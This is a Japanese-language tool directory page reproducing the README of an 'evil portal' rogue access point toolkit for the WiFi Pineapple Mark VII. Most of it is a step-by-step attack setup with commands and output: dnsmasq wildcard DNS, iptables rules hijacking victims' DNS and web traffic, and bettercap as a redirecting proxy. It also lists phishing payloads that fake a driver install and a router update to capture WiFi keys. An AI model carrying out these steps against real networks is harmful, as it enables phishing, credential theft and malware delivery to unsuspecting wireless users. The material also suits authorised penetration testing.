Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/tw-d/wifi-pineapple-mk7_evil-portal
Wi-Fi監査フィッシングワイヤレスセキュリティペネトレーションテストソーシャルエンジニアリングレッドチーミング
GitHubtw-d/wifi-pineapple-mk7_evil-portal

WiFi-Pineapple-MK7_Evil-Portal

WiFiペネトレーションテストのための不正アクセスポイントツールキット。悪意のあるポータルフィッシングペイロードを展開し、資格情報を取得してワイヤレスネットワークに対してソーシャルエンジニアリング攻撃を実行します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1172年前未レビュー

WIFI PINEAPPLE MARK VII - EVIL PORTAL

  • 近接運用のための主要な不正アクセスポイントおよびWiFiペンテストツールキット。
  • 受動的攻撃と能動的攻撃により、脆弱で誤設定されたデバイスを分析します。
  • https://hak5.org/collections/sale/products/wifi-pineapple

作者:: TW-D

バージョン:: 1.0.0

著作権:: Copyright (c) 2024 TW-D

ライセンス:: Rubyと同じ条件で配布

必要条件:: PHP >= 8.1, Ruby >= 2.7.0p0、WiFi Pineapple Mark VII 2.1.3-stable

インストール (Debian系Linuxディストリビューション)::

  • sudo apt-get install php8.1-cli php8.1-curl

  • sudo apt-get install build-essential ruby ruby-dev libpcap-dev

  • sudo gem install sorted_set bettercap

説明

エビルポータルとは、Wi-Fiネットワークのユーザーを騙し、本来の認証ページやホームページの代わりに悪意のあるWebページにリダイレクトするために使用される手法です。

注記 : 「Issues」と「Pull Requests」は歓迎します。

テスト済み環境

オペレーティングシステム(Webブラウザの有無)通知タイプ
Ubuntu 22.04なし
Android 8.0.0システム
Microsoft Windows 10なし
Raspberry Pi bookwormなし
Ubuntu 22.04(Mozilla Firefox)アラート
Microsoft Windows 10(Mozilla Firefox)アラート
Raspberry Pi bookworm(Mozilla Firefox)アラート

設定

ハッカー - WiFi Pineappleへの接続

USB-Cケーブルを介してWiFi Pineappleをコンピュータに接続します。

WiFi Pineapple - Web UI

設定 > ネットワーキング > ワイヤレスクライアントモード : wlan2インターフェースが切断されている必要があります。

ハッカー - 端末1

root@kitploit:~
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
        inet 172.16.42.100  netmask 255.255.255.0  broadcast 172.16.42.255
[...]

(オプション)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE  SERVICE
53/tcp   open   domain
5353/tcp closed mdns
53/udp   open   domain
5353/udp closed zeroconf
[...]

hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit

(オプション)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE SERVICE
53/tcp   open  domain
5353/tcp open  mdns
53/udp   open  domain
5353/udp open  zeroconf
[...]

(オプション)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

(オプション)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000

ハッカー - 端末2

root@kitploit:~
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/

ハッカー - 端末3(オプション)

root@kitploit:~
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate

hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading

hacker@hacker-computer:~$ exit

ペイロードの使用と読み込み

"./payloads/" ディレクトリには以下があります:

開発著者説明使い方
skeleton.htmlTW-D開発用の空のペイロード。ドキュメント
実行著者説明使い方
web-camera.htmlTW-D偽の監視ビデオをシミュレートし、動作のためにドライバーのインストールを要求します。ドキュメント

web-camera

フィッシング著者説明使い方
wifi_security-key.htmlTW-Dインターネット機器の偽のアップデートをシミュレートし、続行するためにWiFiセキュリティキーを要求します。ドキュメント

wifi_security-key

ツールをダウンロード